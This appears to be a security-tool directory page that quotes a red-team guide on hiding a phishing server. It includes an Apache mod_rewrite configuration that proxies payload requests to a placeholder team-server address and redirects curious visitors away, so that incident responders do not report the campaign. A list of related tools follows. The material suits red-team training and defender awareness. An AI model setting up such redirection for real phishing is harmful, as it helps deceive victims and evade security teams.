Invalid URI Redirection with Apache mod_rewrite Logo

Invalid URI Redirection with Apache mod_rewrite

0
Free
Visit Website

There have been times when a curious phish recipient or a zealous help desk staff has loaded the phishing link in their browser and decided to take a peek at a higher directory or the root domain. Of course, most times there isn’t much else site to see. In those cases, the chances of being reported to IR went up significantly, sometimes leading to a phishing campaign being blocked. This is where invalid URI redirection comes in handy. We can whitelist resources the Apache server will proxy for the targets and redirect any other requests to the target’s real domain or another page of our choosing. In the demo below, the user navigates to spoofdomain.com/really/long/url.html and is served a page; however, when the user navigates to spoofdomain.com/really/ the browser is redirected to google.com. RewriteEngine On RewriteCond %{REQUEST_URI} ^/(profiler|payload)/?$ [NC,OR] RewriteCond %{HTTP_REFERER} ^http://SPOOFED-DOMAIN.com [NC] RewriteRule ^.*$ http://TEAMSERVER-IP%{REQUEST_URI} [P] RewriteRule ^.*$ http://REDIRECTION-URL.com/? [L,R=302] Line by line explanation: Enable the rewrite engine If the request's URI is either '/profiler' or '/payload' (with an optional trailing slash), ignoring case; OR If the request's referer starts with 'http://SPOOFED-DOMAIN.com', ignoring case;

FEATURES

ALTERNATIVES

InQL is a Burp Suite extension for advanced GraphQL testing and vulnerability detection

A Rust-based command-line tool for analyzing .apk files to detect vulnerabilities.

A software supply chain security platform that analyzes binaries and software components to detect malware, vulnerabilities, exposed secrets, and tampering throughout the development lifecycle.

An automated API security testing platform that provides continuous vulnerability assessment, validation, and educational resources for API endpoint security.

A script that implements Cognito attacks such as Account Oracle or Priviledge Escalation

Cutting-edge technology for developing security applications within the Linux kernel.

Static application security testing (SAST) tool for scanning source code against security and privacy risks.

A static code analysis tool for parsing common data formats to detect hardcoded credentials and dangerous functions.

PINNED